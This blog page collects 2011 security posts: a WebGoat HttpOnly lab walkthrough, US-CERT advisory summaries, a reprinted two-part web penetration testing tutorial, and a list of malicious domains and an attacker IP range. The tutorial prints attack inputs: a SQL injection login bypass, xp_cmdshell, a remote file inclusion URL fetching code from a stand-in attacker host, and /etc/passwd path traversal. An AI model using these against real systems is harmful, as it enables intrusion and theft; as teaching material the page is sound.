As of 2011, 99% of browsers and most web application frameworks do support httpOnly<ref>Misunderstandings on HttpOnly Cookie</ref>.

Using WebGoat to Test for HttpOnly Support

The goal of this section is to provide a step-by-step example of testing your browser for HttpOnly support.

WARNING

The OWASP WEBGOAT HttpOnly lab is broken and does not show IE 8 Beta 2 with ms08-069 as complete in terms of HttpOnly XMLHTTPRequest header leakage protection. This error is being tracked via http://code.google.com/p/webgoat/issues/detail?id=18.

Getting Started

Figure 1 - Accessing WebGoat's HttpOnly Test Lesson

Assuming you have installed and launched WebGoat, begin by navigating to the ‘HttpOnly Test’ lesson located within the Cross-Site Scripting (XSS) category. After loading the ‘HttpOnly Test’ lesson, as shown in figure 1, you are now able to begin testing web browsers supporting HTTPOnly.

Lesson Goal

If the HttpOnly flag is set, then your browser should not allow a client-side script to access the session cookie. Unfortunately, since the attribute is relatively new, several browsers may neglect to handle the new attribute properly.

The purpose of this lesson is to test whether your browser supports the HttpOnly cookie flag. Note the value of the unique2u cookie. If your browser supports HTTPOnly, and you enable it for a cookie, a client-side script should NOT be able to read OR write to that cookie, but the browser can still send its value to the server. However, some browsers only prevent client side read access, but do not prevent write access.

Testing Web Browsers for HttpOnly Support

The following test was performed on two browsers, Internet Explorer 7 and Opera 9.22, to demonstrate the results when the HttpOnly flag is enforced properly. As you will see, IE7 properly enforces the HttpOnly flag, whereas Opera does not properly enforce the HttpOnly flag.

Disabling HttpOnly
1) Select the option to turn HttpOnly off as shown below in figure 2.
Figure 2 - Disabling HttpOnly
2) After turning HttpOnly off, select the “Read Cookie” button. 
  • An alert dialog box will display on the screen notifying you that since HttpOnly was not enabled, the ‘unique2u’ cookie was successfully read as shown below in figure 3.
Figure 3 - Cookie Successfully Read with HttpOnly Off
3) With HttpOnly remaining disabled, select the “Write Cookie”  button.
  • An alert dialog box will display on the screen notifying you that since HttpOnly was not enabled, the ‘unique2u’ cookie was successfully modified on the client side as shown below in figure 4.
Figure 4 - Cookie Successfully Written with HttpOnly Off
  • As you have seen thus far, browsing without HttpOnly on is a potential threat. Next, we will enable HttpOnly to demonstrate how this flag protects the cookie.
Enabling HttpOnly
4) Select the radio button to enable HttpOnly as shown below in figure 5.
Figure 5 - Enabling HttpOnly
5) After enabling HttpOnly, select the "Read Cookie" button.
  • If the browser enforces the HttpOnly flag properly, an alert dialog box will display only the session ID rather than the contents of the ‘unique2u’ cookie as shown below in figure 6.
Figure 6 - Enforced Cookie Read Protection
  • However, if the browser does not enforce the HttpOnly flag properly, an alert dialog box will display both the ‘unique2u’ cookie and session ID as shown below in figure 7.
Figure 7 - Unenforced Cookie Read Protection
  • Finally, we will test if the browser allows write access to the cookie with HttpOnly enabled.
6) Select the "Write Cookie" button.
  • If the browser enforces the HttpOnly flag properly, client side modification will be unsuccessful in writing to the ‘unique2u’ cookie and an alert dialog box will display only containing the session ID as shown below in figure 8.
Figure 8 - Enforced Cookie Write Protection
  • However, if the browser does not enforce the write protection property of HttpOnly flag for the ‘unique2u’ cookie, the cookie will be successfully modified to HACKED on the client side as shown below in figure 9.
Figure 9 - Unenforced Cookie Write Protection
Posted by CEOinIRVINE
l

Security Advisory

Hacking 2011. 12. 5. 02:17

Adobe Releases Security Advisory for Adobe Flex SDK

added December 1, 2011 at 10:44 am

Adobe has released a security advisory to alert users of a vulnerability that affects Adobe Flex SDK. This vulnerability affects Adobe Flex SDK 4.5.1 and earlier 4.X and 3.6 and earlier 3.X for Windows, Macintosh, and Linux operating systems. Exploitation of this vulnerability may allow an attacker to perform a cross-site scripting attack within the Adobe Flex SDK application.

US-CERT encourages users and administrators to review the Adobe Security Bulletin and apply any necessary updates to mitigate the risk.


Google Releases Chrome 15.0.874.121

added November 17, 2011 at 02:23 pm

Google has released Chrome 15.0.874.121 for Linux, Mac, Windows, and Chrome Frame to address a vulnerability. This vulnerability allows an attacker to execute arbitrary code.

US-CERT encourages users and administrators to review the Google Chrome Releases blog entry and update to Chrome 15.0.874.121.


Internet Systems Consortium Releases BIND-P1 Patches

added November 17, 2011 at 11:27 am

The Internet Systems Consortium has released updates for BIND to address a vulnerability. This vulnerability may allow an attacker to cause a denial-of-service condition. Please refer to the Internet Systems Consortium advisory for additional information.

US-CERT recommends that administrators of this product apply the respective patches for BIND 9.8.1-P1, 9.7.4-P1, 9.6-ESV-R5-P1, and 9.4-ESV-R5-P1 or check with their software vendors for updated versions.


Apple Releases iTunes 10.5.1

added November 15, 2011 at 09:25 am

Apple has released iTunes 10.5.1 to address a vulnerability. This vulnerability may allow an attacker to conduct a man-in-the-middle attack that could lead a user to click on a forged link believed to have originated from Apple.

US-CERT encourages users and administrators to review Apple article HT5030 and apply any necessary updates to help mitigate the risks.


Fraudulent Digital Certificates Could Allow Spoofing

added November 10, 2011 at 04:25 pm | updated November 14, 2011 at 02:48 pm

US-CERT is aware of public reports that DigiCert Sdn. Bhd* has issued 22 certificates with weak encryption keys. This could allow an attacker to use these certificates to impersonate legitimate site owners. DigiCert Sdn. Bhd has revoked all the weak certificates that they issued. Entrust, the parent Certificate Authority to DigiCert Sdn. Bhd, has released a statement containing more information.

Mozilla has released Firefox 8 and Firefox 3.6.24 to address this issue. Additional information can be found in the Mozilla Security Blog.

Microsoft has provided an update for all supported versions of Microsoft Windows to address this issue. Additional information can be found in Microsoft Security Advisory 2641690.

US-CERT encourages users and administrators to apply any necessary updates to help mitigate the risks. US-CERT will provide additional information as it becomes available.

*DigiCert Sdn. Bhd is not affiliated in any way with the US-based corporation DigiCert, Inc.


Adobe Releases Security Advisory for Adobe Flash Player and Adobe AIR

added November 11, 2011 at 09:30 am

Adobe has released a security advisory to alert users of vulnerabilities affecting Adobe Flash Player and Adobe AIR. These vulnerabilities affect Adobe Flash Player 11.0.1.152 and earlier versions for Windows, Macintosh, Linux, Solaris, Adobe Flash Player 11.0.1.153 for Android, and Adobe AIR 3.0 for Windows, Macintosh, and Android. Exploitation of these vulnerabilities may allow an attacker to execute arbitrary code or cause a denial-of-service condition.

US-CERT encourages users and administrators to review the Adobe Security Bulletin and apply any necessary updates to help mitigate the risk.


Apple Releases iOS 5.0.1

added November 10, 2011 at 04:16 pm

Apple has released iOS 5.0.1 for the iPhone 3GS, iPhone 4, iPhone 4S, iPod 3rd generation or later, iPad, and iPad 2 to address multiple vulnerabilities. These vulnerabilities may allow an attacker execute arbitrary code or obtain sensitive information.

US-CERT encourages users and administrators to review Apple Support Article HT5052 and apply any necessary updates to help mitigate the risk.


Google Releases Chrome 15.0.874.120

added November 10, 2011 at 03:23 pm

Google has released Chrome 15.0.874.120 for Linux, Mac, Windows, and Chrome Frame to address multiple vulnerabilities. These vulnerabilities may allow an attacker to execute arbitrary code.

US-CERT encourages users and administrators to review the Google Chrome Releases blog entry and update to Chrome 15.0.874.120.


Operation Ghost Click Malware

added November 10, 2011 at 12:52 pm

On November 9, 2011 US Federal prosecutors announced Operation Ghost Click, an ongoing investigation that resulted in the arrests of a cyber ring of seven people who allegedly ran a massive online advertising fraud scheme that used malicious software to infect at least 4 million computers in more than 100 countries.

The cyber ring, comprised of individuals from Estonia and Russia, allegedly used the malicious software, or malware, to hijack web searches to generate advertising and sales revenue by diverting users from legitimate websites to websites run by the cyber ring. In some cases, the software, known as DNSChanger, would replace advertising on popular websites with other ads when viewed from an infected computer. The malware also could have prevented users' anti-virus software from functioning properly, thus exposing infected machines to unrelated malicious software.

US-CERT encourages users and administrators to use caution when surfing the web and to take the following preventative measures to protect themselves from malware campaigns:

  • Refer to the FBI's announcement of Operation Ghost Click for additional information on how to protect yourself and recover from DNSChanger attacks.
  • Maintain up-to-date antivirus software.
  • Configure your web browser as described in the Securing Your Web Browser document.
  • Do not follow unsolicited web links in email messages.
  • Use caution when opening email attachments. Refer to the Using Caution with Email Attachments Cyber Security Tip for more information on safely handling email attachments.
Posted by CEOinIRVINE
l

Web Penetration Testings

Hacking 2011. 12. 4. 13:10



Note: It is assumed that the reader of this article has some knowledge of the HTTP protocol - specifically, the format of HTTP GET and POST requests, and the purpose of various header fields. This information is available in RFC2616.

Web applications are becoming more prevalent and increasingly more sophisticated, and as such they are critical to almost all major online businesses. As with most security issues involving client/server communications, Web application vulnerabilities generally stem from improper handling of client requests and/or a lack of input validation checking on the part of the developer.

The very nature of Web applications - their ability to collate, process and disseminate information over the Internet - exposes them in two ways. First and most obviously, they have total exposure by nature of being publicly accessible. This makes security through obscurity impossible and heightens the requirement for hardened code. Second and most critically from a penetration testing perspective, they process data elements from within HTTP requests - a protocol that can employ a myriad of encoding and encapsulation techniques.

Most Web application environments (including ASP and PHP, which will both be used for examples throughout the series), expose these data elements to the developer in a manner that fails to identify how they were captured and hence what kind of validation and sanity checking should apply to them. Because the Web "environment" is so diverse and contains so many forms of programmatic content, input validation and sanity checking is the key to Web applications security. This involves both identifying and enforcing the valid domain of every user-definable data element, as well as a sufficient understanding of the source of all data elements to determine what is potentially user definable.

The Root of the Issue: Input Validation

Input validation issues can be difficult to locate in a large codebase with lots of user interactions, which is the main reason that developers employ penetration testing methodologies to expose these problems. Web applications are, however, not immune to the more traditional forms of attack. Poor authentication mechanisms, logic flaws, unintentional disclosure of content and environment information, and traditional binary application flaws (such as buffer overflows) are rife. When approaching a Web application as a penetration tester, all this must be taken into account, and a methodical process of input/output or "blackbox" testing, in addition to (if possible) code auditing or "whitebox" testing, must be applied.

What exactly is a Web application?

A Web application is an application, generally comprised of a collection of scripts, that reside on a Web server and interact with databases or other sources of dynamic content. They are fast becoming ubiquitous as they allow service providers and their clients to share and manipulate information in an (often) platform-independent manner via the infrastructure of the Internet. Some examples of Web applications include search engines, Webmail, shopping carts and portal systems.

How does it look from the users perspective?

Web applications typically interact with the user via FORM elements and GET or POST variables (even a 'Click Here' button is usually a FORM submission). With GET variables, the inputs to the application can be seen within the URL itself, however with POST requests it is often necessary to study the source of form-input pages (or capture and decode valid requests) in order to determine the users inputs.

An example HTTP request that might be provided to a typical Web application is as follows:

GET /sample.php?var=value&var2=value2 HTTP/1.1 | HTTP-METHOD REQUEST-URI PROTOCOL/VERSION
Session-ID: 361873127da673c | Session-ID Header
Host: www.webserver.com | Host Header
<CR><LF><CR><LF> | Two carriage return line feeds

Every element of this request can potentially be used by the Web application processing the request. The REQUEST-URI identifies the unit of code that will be invoked along with the query string: a separated list of &variable=value pairs defining input parameters. This is the main form of Web applications input. The Session-ID header provides a token identifying the client's established session as a primitive form of authentication. The Host header is used to distinguish between virtual hosts sharing the same IP address and will typically be parsed by the Web server, but is, in theory, within the domain of the Web application.

As a penetration tester you must use all input methods available to you in order to elicit exception conditions from the application. Thus, you cannot be limited to what a browser or automatic tools provide. It is quite simple to script HTTP requests using utilities like curl, or shell scripts using netcat. The process of exhaustive blackbox testing a Web application is one that involves exploring each data element, determining the expected input, manipulating or otherwise corrupting this input, and analysing the output of the application for any unexpected behaviour.

The Information Gathering Phase

Fingerprinting the Web Application Environment

One of the first steps of the penetration test should be to identify the Web application environment, including the scripting language and Web server software in use, and the operating system of the target server. All of these crucial details are simple to obtain from a typical Web application server through the following steps:

1. Investigate the output from HEAD and OPTIONS http requests

The header and any page returned from a HEAD or OPTIONS request will usually contain a SERVER: string or similar detailing the Web server software version and possibly the scripting environment or operating system in use.

OPTIONS / HTTP/1.0

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Wed, 04 Jun 2003 11:02:45 GMT
MS-Author-Via: DAV
Content-Length: 0
Accept-Ranges: none
DASL: <DAV:sql>
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
Cache-Control: private

2. Investigate the format and wording of 404/other error pages

Some application environments (such as ColdFusion) have customized and therefore easily recognizable error pages, and will often give away the software versions of the scripting language in use. The tester should deliberately request invalid pages and utilize alternate request methods (POST/PUT/Other) in order to glean this information from the server.

Below is an example of a ColdFusion 404 error page:

3. Test for recognised file types/extensions/directories

Many Web services (such as Microsoft IIS) will react differently to a request for a known and supported file extension than an unknown extension. The tester should attempt to request common file extensions such as .ASP, .HTM, .PHP, .EXE and watch for any unusual output or error codes.

GET /blah.idq HTTP/1.0

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Wed, 04 Jun 2003 11:12:24 GMT
Content-Type: text/html

<HTML>The IDQ file blah.idq could not be found.

4. Examine source of available pages

The source code from the immediately accessible pages of the application front-end may give clues as to the underlying application environment.

<title>Home Page</title>
<meta content="Microsoft Visual Studio 7.0" name="GENERATOR">
<meta content="C#" name="CODE_LANGUAGE">
<meta content="JavaScript" name="vs_defaultClientScript">

In this situation, the developer appears to be using MS Visual Studio 7. The underlying environment is likely to be Microsoft IIS 5.0 with .NET framework.

5. Manipulate inputs in order to elicit a scripting error

In the example below the most obvious variable (ItemID) has been manipulated to fingerprint the Web application environment:

6. TCP/ICMP and Service Fingerprinting
Using traditional fingerprinting tools such as Nmap and Queso, or the more recent application fingerprinting tools Amap and WebServerFP, the penetration tester can gain a more accurate idea of the underlying operating systems and Web application environment than through many other methods. NMAP and Queso examine the nature of the host's TCP/IP implementation to determine the operating system and, in some cases, the kernel version and patch level. Application fingerprinting tools rely on data such as Server HTTP headers to identify the host's application software.

Hidden form elements and source disclosure

In many cases developers require inputs from the client that should be protected from manipulation, such as a user-variable that is dynamically generated and served to the client, and required in subsequent requests. In order to prevent users from seeing and possibly manipulating these inputs, developers use form elements with a HIDDEN tag. Unfortunately, this data is in fact only hidden from view on the rendered version of the page - not within the source.

There have been numerous examples of poorly written ordering systems that would allow users to save a local copy of order confirmation pages, edit HIDDEN variables such as price and delivery costs, and resubmit their request. The Web application would perform no further authentication or cross-checking of form submissions, and the order would be dispatched at a discounted price!

<FORM METHOD="LINK" ACTION="/shop/checkout.htm">
<INPUT TYPE="HIDDEN" name="quoteprice" value="4.25">Quantity: <INPUT TYPE="text"
NAME="totalnum"> <INPUT TYPE="submit" VALUE="Checkout">
</FORM>

This practice is still common on many sites, though to a lesser degree. Typically only non-sensitive information is contained in HIDDEN fields, or the data in these fields is encrypted. Regardless of the sensitivity of these fields, they are still another input to be manipulated by the blackbox penetration tester.

All source pages should be examined (where feasible) to determine if any sensitive or useful information has been inadvertently disclosed by the developer - this may take the form of active content source within HTML, pointers to included or linked scripts and content, or poor file/directory permissions on critical source files. Any referenced executables and scripts should be probed, and if accessible, examined.

Javascript and other client-side code can also provide many clues as to the inner workings of a Web application. This is critical information when blackbox testing. Although the whitebox (or 'code-auditing') tester has access to the application's logic, to the blackbox tester this information is a luxury which can provide for further avenues of attack. For example, take the following chunk of code:

<INPUT TYPE="SUBMIT" onClick="
if (document.forms['product'].elements['quantity'].value >= 255) {
document.forms['product'].elements['quantity'].value='';
alert('Invalid quantity');
return false;
} else {
return true;
}
">

This suggests that the application is trying to protect the form handler from quantity values of 255 of more - the maximum value of a tinyint field in most database systems. It would be trivial to bypass this piece of client-side validation, insert a long integer value into the 'quantity' GET/POST variable and see if this elicits an exception condition from the application.

Determining Authentication Mechanisms

One of the biggest shortcomings of the Web applications environment is its failure to provide a strong authentication mechanism. Of even more concern is the frequent failure of developers to apply what mechanisms are available effectively. It should be explained at this point that the term Web applications environment refers to the set of protocols, languages and formats - HTTP, HTTPS, HTML, CSS, JavaScript, etc. - that are used as a platform for the construction of Web applications. HTTP provides two forms of authentication: Basic and Digest. These are both implemented as a series of HTTP requests and responses, in which the client requests a resource, the server demands authentication and the client repeats the request with authentication credentials. The difference is that Basic authentication is clear text and Digest authentication encrypts the credentials using a nonce (time sensitive hash value) provided by the server as a cryptographic key.

Besides the obvious problem of clear text credentials when using Basic, there is nothing inherently wrong with HTTP authentication, and this clear-text problem be mitigated by using HTTPS. The real problem is twofold. First, since this authentication is applied by the Web server, it is not easily within the control of the Web application without interfacing with the Web server's authentication database. Therefore custom authentication mechanisms are frequently used. These open a veritable Pandora's box of issues in their own right. Second, developers often fail to correctly assess every avenue for accessing a resource and then apply authentication mechanisms accordingly.

Given this, penetration testers should attempt to ascertain both the authentication mechanism that is being used and how this mechanism is being applied to every resource within the Web application. Many Web programming environments offer session capabilities, whereby a user provides a cookie or a Session-ID HTTP header containing a psuedo-unique string identifying their authentication status. This can be vulnerable to attacks such as brute forcing, replay, or re-assembly if the string is simply a hash or concatenated string derived from known elements.

Every attempt should be made to access every resource via every entry point. This will expose problems where a root level resource such as a main menu or portal page requires authentication but the resources it in turn provides access to do not. An example of this is a Web application providing access to various documents as follows. The application requires authentication and then presents a menu of documents the user is authorised to access, each document presented as a link to a resource such as:

http://www.server.com/showdoc.asp?docid=10

Although reaching the menu requires authentication, the showdoc.asp script requires no authentication itself and blindly provides the requested document, allowing an attacker to simply insert the docid GET variable of his desire and retrieve the document. As elementary as it sounds this is a common flaw in the wild.

Conclusions

In this article we have presented the penetration tester with an overview of web applications and howweb developers obtain and handle user inputs. We have also shown the importance of fingerprinting the target environment and developing an understanding of the back-end of an application. Equipped with this information, the penetration tester can proceed to targeted vulnerability tests and exploits. The next installment in this series will introduce code and content-manipulation attacks, such as PHP/ASP code injection, SQL injection, Server-Side Includes and Cross-site scripting.

http://www.securityfocus.com/infocus/1704

Penetration Testing for Web Applications (Part Two)
by Jody Melbourne and David Jorm
last updated July 3, 2003

Our first article in this series covered user interaction with Web applications and explored the various methods of HTTP input that are most commonly utilized by developers. In this second installment we will be expanding upon issues of input validation - how developers routinely, through a lack of proper input sanity and validity checking, expose their back-end systems to server-side code-injection and SQL-injection attacks. We will also investigate the client-side problems associated with poor input-validation such as cross-site scripting attacks.

The Blackbox Testing Method

The blackbox testing method is a technique for hardening and penetration-testing Web applications where the source code to the application is not available to the tester. It forces the penetration tester to look at the Web application from a user's perspective (and therefore, an attacker's perspective). The blackbox tester uses fingerprinting methods (as discussed in Part One of this series) to probe the application and identify all expected inputs and interactions from the user. The blackbox tester, at first, tries to get a 'feel' for the application and learn its expected behavior. The term blackbox refers to this Input/UnknownProcess/Output approach to penetration testing.

The tester attempts to elicit exception conditions and anomalous behavior from the Web application by manipulating the identified inputs - using special characters, white space, SQL keywords, oversized requests, and so forth. Any unexpected reaction from the Web application is noted and investigated. This may take the form of scripting error messages (possibly with snippets of code), server errors (HTTP 500), or half-loaded pages.


Figure 1 - Blackbox testing GET variables

Any strange behavior on the part of the application, in response to strange inputs, is certainly worth investigating as it may mean the developer has failed to validate inputs correctly!

SQL Injection Vulnerabilities

Many Web application developers (regardless of the environment) do not properly strip user input of potentially "nasty" characters before using that input directly in SQL queries. Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use subselects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell commands on the underlying operating system.

Locating SQL Injection Vulnerabilities

Often the most effective method of locating SQL injection vulnerabilities is by hand - studying application inputs and inserting special characters. With many of the popular backends, informative errors pages are displayed by default, which can often give clues to the SQL query in use: when attempting SQL injection attacks, you want to learn as much as possible about the syntax of database queries.


Figure 2 - Potential SQL injection vulnerability


Figure 3 - Another potential SQL injection hole

Example: Authentication bypass using SQL injection

This is one of the most commonly used examples of an SQL injection vulnerability, as it is easy to understand for non-SQL-developers and highlights the extent and severity of these vulnerabilities. One of the simplest ways to validate a user on a Web site is by providing them with a form, which prompts for a username and password. When the form is submitted to the login script (eg. login.asp), the username and password fields are used as variables within an SQL query.

Examine the following code (using MS Access DB as our backend):

user = Request.form("user")
pass = Request.form("pass")
Set Conn = Server.CreateObject("ADODB.Connection")
Set Rs = Server.CreateObject("ADODB.Recordset")
Conn.Open (dsn)
SQL = "SELECT C=COUNT(*) FROM users where pass='" & pass & "' and user='" & user & "'"
rs.open (sql,conn) if rs.eof or rs.bof then
response.write "Database Error"
else
if rs("C") < 1 then
response.write "Invalid Credentials"
else
response.write "Logged In"
end if
end if

In this scenario, no sanity or validity checking is being performed on the user and pass variables from our form inputs. The developer may have client-side (eg. Javascript) checks on the inputs, but as has been demonstrated in the first part of this series, any attacker who understands HTML can bypass these restrictions. If the attacker were to submit the following credentials to our login script:

user: test' OR '1'='1
pass: test

the resulting SQL query would look as follows:

SELECT * FROM users where pass='test' and user='test' OR '1' = '1'

In plain English, "access some data where user and pass are equal to 'test', or 1 is equal to 1." As the second condition is always true, the first condition is irrelevant, and the query data is returned successfully - in this case, logging the attacker into the application.

For recent examples of this class of vulnerability, please refer to http://www.securityfocus.com/bid/4520 and http://www.securityfocus.com/bid/4931. Both of these advisories detail SQL authentication issues similar to the above.

MS-SQL Extended stored procedures

Microsoft SQL Server 7 supports the loading of extended stored procedures (a procedure implemented in a DLL that is called by the application at runtime). Extended stored procedures can be used in the same manner as database stored procedures, and are usually employed to perform tasks related to the interaction of the SQL server with its underlying Win32 environment. MSSQL has a number of built-in XSPs - most of these stored procedures are prefixed with an xp_.

Some of the built-in functions useful to the MSSQL pen-tester:

* xp_cmdshell - execute shell commands
* xp_enumgroups - enumerate NT user groups
* xp_logininfo - current login info
* xp_grantlogin - grant login rights
* xp_getnetname - returns WINS server name
* xp_regdeletekey - registry manipulation
* xp_regenumvalues
* xp_regread
* xp_regwrite
* xp_msver - SQL server version info

A non-hardened MS-SQL server may allow the DBO user to access these potentially dangerous stored procedures (which are executed with the permissions of the SQL server instance - in many cases, with SYSTEM privileges).

There are many extended/stored procedures that should not be accessible to any user other than the DB owner. A comprehensive list can be found at MSDN: http://msdn.microsoft.com/library/default...._sp_00_519s.asp

A well-maintained guide to hardening MS-SQL Server 7 and 2000 can be found at SQLSecurity.com: http://www.sqlsecurity.com/DesktopDefault....index=3&tabid=4

PHP and MySQL Injection

A vulnerable PHP Web application with a MySQL backend, despite PHP escaping numerous 'special' characters (with Magic_Quotes enabled), can be manipulated in a similar manner to the above ASP application. MySQL does not allow for direct shell execution like MSSQL's xp_cmdshell, however in many cases it is still possible for the attacker to append arbitrary conditions to queries, or use UNIONs and subselects to access or modify records in the database.

For more information on PHP/MySQL security issues, refer to http://www.phpadvisory.com. PHP/Mysql security issues are on the increase - reference phpMyshop (http://www.securityfocus.com/bid/6746) and PHPNuke (http://www.securityfocus.com/bid/7194) advisories.

Code and Content Injection

What is code injection? Code injection vulnerabilities occur where the output or content served from a Web application can be manipulated in such a way that it triggers server-side code execution. In some poorly written Web applications that allow users to modify server-side files (such as by posting to a message board or guestbook) it is sometimes possible to inject code in the scripting language of the application itself.

This vulnerability hinges upon the manner in which the application loads and passes through the contents of these manipulated files - if this is done before the scripting language is parsed and executed, the user-modified content may also be subject to parsing and execution.

Example: A simple message board in PHP

The following snippet of PHP code is used to display posts for a particular message board. It retrieves the messageid GET variable from the user and opens a file $messageid.txt under /var/www/forum:

<?php
include('/var/www/template/header.inc');
if (isset($_GET['messageid']) && file_exists('/var/www/forum/' . stripslashes($messageid) . '.txt') &&
is_numeric($messageid)) {
include('/var/www/forum/' . stripslashes($messageid) . '.txt');
} else {
include('/var/www/template/error.inc');
}
include('/var/www/template/footer.inc');
?>

Although the is_numeric() test prevents the user from entering a file path as the messageid, the content of the message file is not checked in any way. (The problem with allowing unchecked entry of file paths is explained later) If the message contained PHP code, it would be include()'d and therefore executed by the server.

A simple method of exploiting this example vulnerability would be to post to the message board a simple chunk of code in the language of the application (PHP in this example), then view the post and see if the output indicates the code has been executed.

Server Side Includes (SSI)

SSI is a mechanism for including files using a special form of HTML comment which predates the include functionality of modern scripting languages such as PHP and JSP. Older CGI programs and 'classic' ASP scripts still use SSI to include libraries of code or re-usable elements of content, such as a site template header and footer. SSI is interpreted by the Web server, not the scripting language, so if SSI tags can be injected at the time of script execution these will often be accepted and parsed by the Web server. Methods of attacking this vulnerability are similar to those shown above for scripting language injection. SSI is rapidly becoming outmoded and disused, so this topic will not be covered in any more detail.

Miscellaneous Injection

There are many other kinds of injection attacks common amongst Web applications. Since a Web application primarily relies upon the contents of headers, cookies and GET/POST variables as input, the actions performed by the application that is driven by these variables must be thoroughly examined. There is a potentially limitless scope of actions a Web application may perform using these variables: open files, search databases, interface with other command systems and, as is increasingly common in the Web services world, interface with other Web applications. Each of these actions requires its own syntax and requires that input variables be sanity-checked and validated in a unique manner.

For example, as we have seen with SQL injection, SQL special characters and keywords must be stripped. But what about a Web application that opens a serial port and logs information remotely via a modem? Could the user input a modem command escape string, cause the modem to hangup and redial other numbers? This is merely one example of the concept of injection. The critical point for the penetration tester is to understand what the Web application is doing in the background - the function calls and commands it is executing - and whether the arguments to these calls or strings of commands can be manipulated via headers, cookies and GET/POST variables.

Example: PHP fopen()

As a real world example, take the widespread PHP fopen() issue. PHP's file-open fopen() function allows for URLs to be entered in the place of a filename, simplifying access to Web services and remote resources. We will use a simple portal page as an example:

URL: http://www.example.com/index.php?file=main

<?php
include('/var/www/template/header.inc');
if (isset($_GET['file']) {
$fp = fopen("$file" . ".html","r");
} else {
$fp = fopen("main.html", "r");
}
include('/var/www/template/footer.inc');
?>

The index.php script includes header and footer code, and fopen()'s the page indicated by the file GET variable. If no file variable is set, it defaults to main.html. The developer is forcing a file extension of .html, but is not specifying a directory prefix. A PHP developer inspecting this code should notice immediately that it is vulnerable to a directory traversal attack, as long as the filename requested ends in .html (See below).

However, due to fopen()'s URL handling features, an attacker in this case could submit:

http://www.example.com/index.php?file=http...ersite.com/main

This would force the example application to fopen() the file main.html at www.hackersite.com. If this file were to contain PHP code, it would be incorporated into the output of the index.php application, and would therefore be executed by the server. In this manner, an attacker is able to inject arbitrary PHP code into the output of the Web application, and force server-side execution of the code of his/her choosing.

W-Agora forum was recently found to have such a vulnerability in its handling of user inputs that could result in fopen() attacks - refer to http://www.securityfocus.com/bid/6463 for more details. This is a perfect example of this particular class of vulnerability.

Many skilled Web application developers are aware of current issues such as SQL injection and will use the many sanity-checking functions and command-stripping mechanisms available. However, once less common command systems and protocols become involved, sanity-checking is often flawed or inadequate due to a lack of comprehension of the wider issues of input validation.

Path Traversal and URIs

A common use of Web applications is to act as a wrapper for files of Web content, opening them and returning them wrapped in chunks of HTML. This can be seen in the above sample for code injection. Once again, sanity checking is the key. If the variable being read in to specify the file to be wrapped is not checked, a relative path can be entered.

Copying from our misc. code injection example, if the developer were to fail to specify a file suffix with fopen():

fopen("$file" , "r");

...the attacker would be able to traverse to any file readable by the Web application.

http://www.example.com/index.php?file=../...../../etc/passwd

This request would return the contents of /etc/passwd unless additional stripping of the path character (/.) had been performed on the file variable.

This problem is compounded by the automatic handling of URIs by many modern Web scripting technologies, including PHP, Java and Microsoft's .NET. If this is supported on the target environment, vulnerable applications can be used as an open relay or proxy:

http://www.example.com/index.php?file=http...www.google.com/

This flaw is one of the easiest security issues to spot and rectify, although it remains common on smaller sites whose application code performs basic content wrapping. The problem can be mitigated in two ways. First, by implementing an internal numeric index to the documents or, as in our message board code, using files named in numeric sequence with a static prefix and suffix. Second, by stripping any path characters such as [/\.] which attackers could use to access resources outside of the application's directory tree.

Cross Site Scripting

Cross Site Scripting attacks (a form of content-injection attack) differs from the many other attack methods covered in this article in that it affects the client-side of the application (ie. the user's browser). Cross Site Scripting (XSS) occurs wherever a developer incorrectly allows a user to manipulate HTML output from the application - this may be in the result of a search query, or any other output from the application where the user's input is displayed back to the user without any stripping of HTML content.

A simple example of XSS can be seen in the following URL:

http://server.example.com/browse.cfm?categ...ID=1&name=Books

In this example the content of the 'name' parameter is displayed on the returned page. A user could submit the following request:

http://server.example.com/browse.cfm?categ...<h1>Books

If the characters < > are not being correctly stripped or escaped by this application, the "<h1>" would be returned within the page and would be parsed by the browser as valid html. A better example would be as follows:

http://server.example.com/browse.cfm?categ...</script>

In this case, we have managed to inject Javascript into the resulting page. The relevant cookie (if any) for this session would be displayed in a popup box upon submitting this request.

This can be abused in a number of ways, depending on the intentions of the attacker. A short piece of Javascript to submit a user's cookie to an arbitrary site could be placed into this URL. The request could then be hex-encoded and sent to another user, in the hope that they open the URL. Upon clicking the trusted link, the user's cookie would be submitted to the external site. If the original site relies on cookies alone for authentication, the user's account would be compromised. We will be covering cookies in more detail in part three of this series.

In most cases, XSS would only be attempted from a reputable or widely-used site, as a user is more likely to click on a long, encoded URL if the server domain name is trusted. This kind of attack does not allow for any access to the client beyond that of the affected domain (in the user's browser security settings).

For more details on Cross-Site scripting and it's potential for abuse, please refer to the CGISecurity XSS FAQ at http://www.cgisecurity.com/articles/xss-faq.shtml.

Conclusion

In this article we have attempted to provide the penetration tester with a good understanding of the issue of input validation. Each of the subtopics covered in this article are deep and complex issues, and could well require a series of their own to cover in detail. The reader is encouraged to explore the documents and sites that we have referenced for further information.

The final part of this series will discuss in more detail the concepts of sessions and cookies - how Web application authentication mechanisms can be manipulated and bypassed. We will also explore the issue of traditional attacks (such as overflows and logic bugs) that have plagued developers for years, and are still quite common in the Web applications world.
http://www.securityfocus.com/infocus/1709

'Hacking' 카테고리의 다른 글

HttpOnly  (0) 2011.12.10
Security Advisory  (1) 2011.12.05
Blocked DOMAINS / IP address for spreading malicous files (Chat.EXE, Chat.DLL)  (0) 2011.11.30
Virus Pattern (Trend Micro)  (0) 2011.11.29
Informix SQL Injection Cheat Sheet  (0) 2011.11.08
Posted by CEOinIRVINE
l

navy.scvhosts.com:443
navy.conimes.com:443
mail.lovexfree.com:443
ncw.winlogon.net:443
gold.MrBonus.com:443
shoes.sellClassics.com:443

[ATTACKER IP]src IP : 222.122.198.0/24

'Hacking' 카테고리의 다른 글

Security Advisory  (1) 2011.12.05
Web Penetration Testings  (0) 2011.12.04
Virus Pattern (Trend Micro)  (0) 2011.11.29
Informix SQL Injection Cheat Sheet  (0) 2011.11.08
DB2 SQL Injection Cheat Sheet  (0) 2011.11.08
Posted by CEOinIRVINE
l